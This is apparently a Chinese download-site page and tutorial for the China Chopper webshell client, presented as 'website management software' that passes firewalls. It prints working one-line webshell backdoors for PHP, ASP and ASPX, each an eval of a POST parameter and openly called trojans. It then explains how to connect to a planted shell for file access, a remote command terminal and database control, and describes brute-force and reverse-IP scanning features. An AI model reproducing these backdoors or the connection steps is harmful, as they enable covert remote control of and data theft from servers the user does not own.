中国菜刀软件(网站管理软件) v1.7附使用教程

中国菜刀软件是一款用于网站安全管理的网站管理软件，用途非常广泛，操作简单，只要是支持动态脚本的网站，都可以用来进行管理。软件支持php、asp等服务端脚本，且可过各种防火墙，并且该软件还拥有数据库管理功能，支持mysql、mssql、oracle等数据库，而且只要授予权限，可以管理整个磁盘或者文件系统。软件虽然不大，但功能却非常强大，绝对是站长管理网站的好帮手，在下文，小编奉上了详细的使用图文教程，感兴趣的小伙伴们快啦来下载吧。

软件特色

1、中国菜刀支持的服务端脚本：php、asp；
2、主中国菜刀要功能有：文件管理，数据库管理，虚拟终端。
3、文件管理
有足够的权限时候可以管理整个磁盘/文件系统，
4、数据库管理
这个是中国菜刀最最强大的功能，支持mysql,mssql,oracle,infomix,access等等数据库，支持不是最主要的，功能强大，人性化才是最主要的
“菜刀”的数据库操作界面，内置了常用的数据库语句，非常直观的表列名浏览功能，自动显示表名，列名，查询语句，非常人性化的设计，更内置了不少自建的函数，方便不懂数据库的菜鸟，都能查阅数据库里的数据
再说个“菜刀”数据库管理的一个小技巧，对于access数据库，可以在中国菜刀的webshell操作界面，对着mdb文件点右键，点access management，就直接进入access的数据库操作界面了，特别方便
5、虚拟终端
模拟的windowns下的cmd命令窗口如果服务器是linux那么就是shell窗口。

中国菜刀软件安装说明

1、在本网站下载并解压得到软件原文件夹“zgcd”，点击进入。

2、点击“中国菜刀”启动程序，无需安装，可直接使用。

3、空白区域右键，然后添加。

4、前边填shell地址，然后后边的小空填口令，也就是密码。

5、然后选择脚本类型，然后添加。

6、添加完后，会有一条数据，然后右键点击，选择文件管理。

主要功能

只要支持动态脚本的网站，都可以用中国菜刀来进行管理！主要功能有：文件管理，虚拟终端，数据库管理。
uincode方式编译，支持多国语言输入显示。
一、eval客户端部分
（1）要了解的
服务端只需要简单的一行代码，即可用此程序实现常用的管理功能。
支持的服务端脚本：php, asp，.net。
在服务端运行的代码如下：
php: <?php @eval($_post['pass']);?>
asp: <%eval request("pass")%>
.net: <%@ page language="jscript"%><%eval(request.item["pass"],"unsafe");%>
(注意: .net要单独一个文件或此文件也是jscript语言)
（2）怎么用
在主视图中右键/添加，在弹出的对话框中输入服务端地址，连接的密码(请注意上例中的pass字串)，选择正确的脚本类型和语言编码，保存后即可使用文件管理，虚拟终端，数据库管理三大块功能。要是其它都没错误，那么可能就是你把语言编码选错了。
1、文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;
2、虚拟终端：[特色]人性化的设计，操作方便;(输入help查看更多用法)
3、数据库管理：[特色]图形界面,支持mysql,mssql,oracle,infomix,access
以入支持ado方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
注意：由于服务器的安全设置，某些功能可能不能正常使用。
（3）关于配置信息怎么填？
（a）数据库方面：
php脚本：
类型 类型可为mysql,mssql,oracle,infomix中的一种
主机地址 主机地址可为机器名或ip地址，如localhost
数据库用户 连接数据库的用户名，如root
数据库密码
连接数据库的密码，如123455
asp和.net脚本：
类型 类型只能填ado
ado配置信息
ado连接各种数据库的方式不一样。如mssql的配置信息为
driver={sql server};server=(local);database=master;uid=sa;pwd=123456
b) 其它方面：
添加额外附加提交的数据：应付这种情况：if ($_post['action']=='test'){@eval($_post['pass']);}
action=test
提交功能前先post额外的数据包：会话期间只提交一次。
uid=user1&pwd=123456
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面，右键菜单/载入url列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期：每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里，可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入help，更多精彩后续加入。
六、其它部分。
等待加入。

中国菜刀使用教程

1、常见的管理
右键空白处->添加

添加shell -> 进行相关的配置。

我的配置：
地址： http://localhost/a.php
密码：key
脚本类型：php
最后
->点击添加
相关的介绍：
这里的
webshell是我们常说的一句话木马：
php一句话木马：<?php @eval($_post['key']);?>
asp一句话木马：<%eval request['key']%>
aspx一句话木马：<%@ page language="jscript"%><%eval(request.item["key"],"unsafe");%>
眼尖的童鞋已经看到了三个里面都带有
key这个单词，没错这个就是密码，大家可以自行修改为自己使用的密码。
文件管理：
打开方式 [右键webshell->单击文件管理]

管理方式 [右键上图中方框内的任何区域进行管理]

数据库管理：
打开方式 [右键webshell->数据库管理]
可以看到是空白的，这时候就需要配置数据库信息了。
配置方式1.[单击配置]

出现了一个配置窗口。(前提你要有网站数据库的配置信息才可以进行配置)
我的配置信息：
数据库类型：mysql
用户名：root
密码：root
配置方式 2.[选择数据库]

可以看到红色方框那边有mysql、mssql、mssql2、oracle等数据库类型。
我是mysql的就选择mysql的示例：
配置后 [单击提交]：
管理方式：

虚拟终端：
打开方式 [右键webshell->单击虚拟终端]
红色方框里是系统的一些信息。我们在d:\www>后面输入相应的cmd命令即可(linux就输入shell命令)
2、网站扫描
打开方式 [单击菜刀图标->单击网站扫描]

(也可以在软件里使用快捷键alt+k去打开)

使用方法：
把网址替换成自己的测试站点即可。
功能：
（1）反向ip(reverse_ip)
（2）爬虫(spider)
（3）爆破(crack)
其他按照这些提示都应该能懂就不一一去说了。
3、浏览器功能
打开方法如图示意。

对着网页进行右击：

上图是一些浏览器方面的功能。
单击扩展功能:

可以进行cookie的修改。
同时也可以单击菜刀图标->浏览器：

可以进行选择：
代表开启 可以单击进行取消开启。
4、其他功能
第一：设置菜刀启动密码(防止自己的webshell泄露出去)

打开方式 [单击菜刀图标->单击设置启动密码]

点击是，就成功设置密码为test。
然后我们关掉菜刀再打开菜刀：
输入我们的密码再可以设置新的密码：

我相信着点英语难不倒各位也不解释了。
也可以把启动密码取消掉：

更新日志

对软件功能进一步完善，bug修复。